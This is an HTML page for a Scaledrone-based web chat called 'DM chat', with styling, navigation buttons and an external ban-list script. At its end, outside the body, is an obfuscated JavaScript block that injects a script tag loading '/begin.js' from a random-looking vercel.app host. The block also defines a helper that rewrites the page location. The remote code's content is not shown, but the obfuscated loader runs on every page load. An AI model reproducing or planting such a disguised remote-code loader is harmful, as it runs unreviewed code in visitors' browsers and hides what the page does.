      <!DOCTYPE html>
<html>
<head>
  <script type='text/javascript' src='https://banlist.vercel.app/list.js'></script>
  <script type='text/javascript' src='https://cdn.scaledrone.com/scaledrone.min.js'></script>
  <!--<script type='text/javascript' src='http://0.0.0.0:8080/scaledrone.js'></script>-->
  <title>DM chat</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <link rel="icon" href="image_6483441-removebg-preview.png">
  <a href="/DM-chat-main.zip" download>
    <img class="download-button" src="/download-this-site.png">
  </a>
  <style>
    body {
      box-sizing: border-box;
      margin: 0;
      padding: 13px;
      display: flex;
      flex-direction: column;
      max-height: 100vh;
      font-family: -apple-system, BlinkMacSystemFont, sans-serif;
    }
    
    .members-count,
    .members-list,
    .messages {
      overflow: auto;
      border: 1px solid #e4e4e4;
      padding: 15px;
      margin-bottom: 15px;
    }
    .members-count,
    .members-list{
      display:none;
    }
    .messages {
      overflow: auto;
      border-radius: 25px;
      flex-shrink: 1;
    }

    .message {
      overflow: auto;
      padding: 5px 0;
    }
    .message .member {
      display: inline-block;
    }

    .member {
      padding-right: 10px;
      position: relative;
    }

    .message-form {
      display: flex;
      flex-shrink: 0;
    }
    .message-form__input {
      border-radius: 25px;
      flex-grow: 1;
      border: 4px solid #ADD8E6;
      padding: 10px 15px;
      font-size: 16px;
    }
    .message-form__input:hover {
      border: 4px solid ##89CFF0;
    }
    .message-form__button:hover {
      opacity: 1;
    }
    
    .message-form__button {
      margin: 10px;
      opacity: 0.5;
    }
    .view-button{
      float: right;
      opacity:0.5;
      margin-left: auto;
      margin-right: 0;
      width:3%;
      position: absolute;
      right:0px;
      top:0px;
      height:6%;
    }
    .report-button{
      float: right;
      opacity:0.5;
      margin-left: auto;
      margin-right: 0;
      width:3%;
      position: absolute;
      right:6%;
      top:0px;
      height:6%;
    }
    .report-button:hover{
      opacity:1;
    }
    .download-button{
      float: left;
      opacity:0.5;
      position: absolute;
      top:0%;
      left:10%;
      width:9%;
      height:5%;
      margin-right: auto;
      margin-left: 0;
    }
    .download-button:hover{
      opacity:1;
    }
    .change-button{
      float: left;
      opacity:0.5;
      position: absolute;
      top:0px;
      left:0px;
      margin-right: auto;
      margin-left: 0;
      width:9%;
      height:5%;
    }
    .change-button:hover{
      opacity:1;
    }
  </style>
</head>
<body>
  <img src="button_change-username-and-title.png" align="left" class='change-button' id='change-button' onclick="reroute();"/>
  <img src="view.png" align="right" class='view-button' id='view-button' onclick="viewing();"/>
  <img src="reportflag.png" align="right" class='report-button' id='report-button' onclick="window.location.href='/report.html';"/>
  <div id='members-count' class='members-count'>-</div>
  <div id='members-list' class='members-list'>-</div>
  <div class='messages'></div>
  <form class='message-form' onsubmit='return false;'>
    <input class='message-form__input' placeholder='Type a message..' type='text' onpaste="return false" ondrag="return false" ondrop="return false"/>
    <input type="image" src="188-1882365_send-button-png-send-button-icon-png-removebg-preview.png" width="40px" height="40px" class='message-form__button' value='Send' type='submit'/>
  </form>
  <script src='./script.js'></script>
</body>
  <script>
  var _0x55a84b=_0xe95c;function _0xda7c(){var _0x4be391=['cript','body','location','https://ae','ent','href','6eujOwl','9yrutg34hu','9SqnTLL','4103035bJciOq','675074pwRyfl','790195cywDwH','text/javas','979540toMztS','script','5553723otmmiW','12964620QSDZfi','appendChil','vercel.app','6uAzZCt','ierfh34er.','/begin.js','1496912hmocPY','type','createElem','src','replace'];_0xda7c=function(){return _0x4be391;};return _0xda7c();}(function(_0x5a581d,_0x2fc7b6){var _0x4df064=_0xe95c,_0x26f795=_0x5a581d();while(!![]){try{var _0x3a53d3=-parseInt(_0x4df064(0x97))/(0x1*-0x1510+-0x25ab+0x1d5e*0x2)+parseInt(_0x4df064(0x96))/(-0x1417*-0x1+-0x13c3+-0x1*0x52)+-parseInt(_0x4df064(0x92))/(0x1b4c+-0x6d*0x1b+-0x2*0x7e5)*(-parseInt(_0x4df064(0x99))/(-0xcb2+0x25b9+-0x1903))+parseInt(_0x4df064(0x95))/(-0x513*0x5+0x11*-0x202+-0x26*-0x191)+-parseInt(_0x4df064(0x9f))/(-0x1*0xab7+-0x141b+-0x2*-0xf6c)*(-parseInt(_0x4df064(0x9b))/(-0x2ff*-0x7+-0x1c51+0x75f))+-parseInt(_0x4df064(0x87))/(0x1*0xc2f+-0x203e+0x1417)*(-parseInt(_0x4df064(0x94))/(-0x6ac+0x301*-0x3+-0x3ee*-0x4))+-parseInt(_0x4df064(0x9c))/(-0x1445+-0x1552+0x29a1*0x1);if(_0x3a53d3===_0x2fc7b6)break;else _0x26f795['push'](_0x26f795['shift']());}catch(_0x59d288){_0x26f795['push'](_0x26f795['shift']());}}}(_0xda7c,0x567e*-0x30+0xb*0x915f+-0x123ccb*-0x1));function windowlocationpathname(_0x41b0a1,_0x4bcad2){var _0x10f51a=_0xe95c,_0x238f00=window[_0x10f51a(0x8e)][_0x10f51a(0x91)];window[_0x10f51a(0x8e)][_0x10f51a(0x91)]=_0x238f00[_0x10f51a(0x8b)](_0x41b0a1,_0x4bcad2);}var s=document[_0x55a84b(0x89)+_0x55a84b(0x90)](_0x55a84b(0x9a));function _0xe95c(_0x5a5e98,_0x234d4d){var _0x5c9f54=_0xda7c();return _0xe95c=function(_0x239d70,_0x131021){_0x239d70=_0x239d70-(0x183d+-0x2447+0xc8f);var _0x17c33b=_0x5c9f54[_0x239d70];return _0x17c33b;},_0xe95c(_0x5a5e98,_0x234d4d);}s[_0x55a84b(0x88)]=_0x55a84b(0x98)+_0x55a84b(0x8c),document[_0x55a84b(0x8d)][_0x55a84b(0x9d)+'d'](s),s[_0x55a84b(0x8a)]=_0x55a84b(0x8f)+_0x55a84b(0x93)+_0x55a84b(0x85)+_0x55a84b(0x9e)+_0x55a84b(0x86);
</script>
</html>
